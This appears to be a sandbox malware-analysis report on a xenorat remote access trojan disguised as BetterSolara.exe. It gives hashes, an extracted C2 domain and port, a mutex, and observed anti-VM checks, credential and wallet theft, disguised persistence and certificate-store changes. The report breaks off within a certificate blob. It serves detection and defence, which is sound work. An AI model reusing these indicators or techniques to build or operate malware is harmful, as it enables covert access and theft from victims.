xenorat | 3cb38b6703b6de0b6d3ccd9c600c217b497d694f7c76566cc38f5a518848306e

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
29-05-2024 16:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BetterSolara.exe
Size

16.7MB
MD5

3934847f717f78cf77739e4000f3eb05
SHA1

6c567b0e3a2779836988bc331b9ac3cec928930e
SHA256

3cb38b6703b6de0b6d3ccd9c600c217b497d694f7c76566cc38f5a518848306e
SHA512

ac049def2ca4875abf560fead264b3599ec0cf476c911ab8b5d93ecdb2f4b0e828a07a18253bbd7c67914b53d1c6c594f8093e0b45252de8c606662da6c56b58
SSDEEP

393216:Y/m3wnMS9DKfopmskhjDd8Bcq1GX4yKQ4x6XEdrme:Y/cSdUopm5dqBBUVT46Use

Score

10^/10

xenorat evasion execution persistence rat spyware stealer themida trojan

Malware Config

Extracted

Family

xenorat

taking-headquarters.gl.at.ply.gg

Mutex

Xeno_rat_nd8912d

Attributes

install_path
appdata
port
3069
startup_name
Console

Signatures

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

cd57e4c171d6e8f5ea8b8f824a6a7316.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4820 powershell.exe
688 powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

pid	process
4820	powershell.exe
688	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

cd57e4c271d6e8f5ea8b8f824a6a7316.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cd57e4c171d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

BetterSolara.execd57e4c172d6e8f5ea8b8f824a6a7316.execd57e4c172d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	BetterSolara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	cd57e4c172d6e8f5ea8b8f824a6a7316.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	cd57e4c172d6e8f5ea8b8f824a6a7316.exe

Executes dropped EXE 4 IoCs

Processes:

cd57e4c171d6e8f5ea8b8f824a6a7316.execd57e4c172d6e8f5ea8b8f824a6a7316.execd57e4c271d6e8f5ea8b8f824a6a7316.execd57e4c172d6e8f5ea8b8f824a6a7316.exe

pid	process
2068	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
2760	cd57e4c172d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe

Loads dropped DLL 5 IoCs

Processes:

cd57e4c171d6e8f5ea8b8f824a6a7316.exe

pid	process
2068	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
2068	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
2068	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
2068	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
2068	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.dll	themida
behavioral1/memory/2068-1793-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/2068-1796-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/2068-1797-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/2068-1798-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/2068-1804-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/2068-1809-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/2068-1813-0x0000000180000000-0x0000000180C32000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

cd57e4c271d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	cd57e4c271d6e8f5ea8b8f824a6a7316.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

cd57e4c171d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

20 discord.com
21 discord.com
40 raw.githubusercontent.com
41 raw.githubusercontent.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

14 api.ipify.org
15 api.ipify.org
16 ip-api.com

flow	ioc
20	discord.com
21	discord.com
40	raw.githubusercontent.com
41	raw.githubusercontent.com

flow	ioc
14	api.ipify.org
15	api.ipify.org
16	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

cd57e4c271d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	cd57e4c271d6e8f5ea8b8f824a6a7316.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

cd57e4c171d6e8f5ea8b8f824a6a7316.exe

pid process

2068 cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1052 schtasks.exe
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exewmic.exe

pid process

3032 wmic.exe
4084 wmic.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 17 Go-http-client/1.1

pid	process
1052	schtasks.exe

pid	process
3032	wmic.exe
4084	wmic.exe

description	flow	ioc
HTTP User-Agent header	17	Go-http-client/1.1

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

cd57e4c271d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c6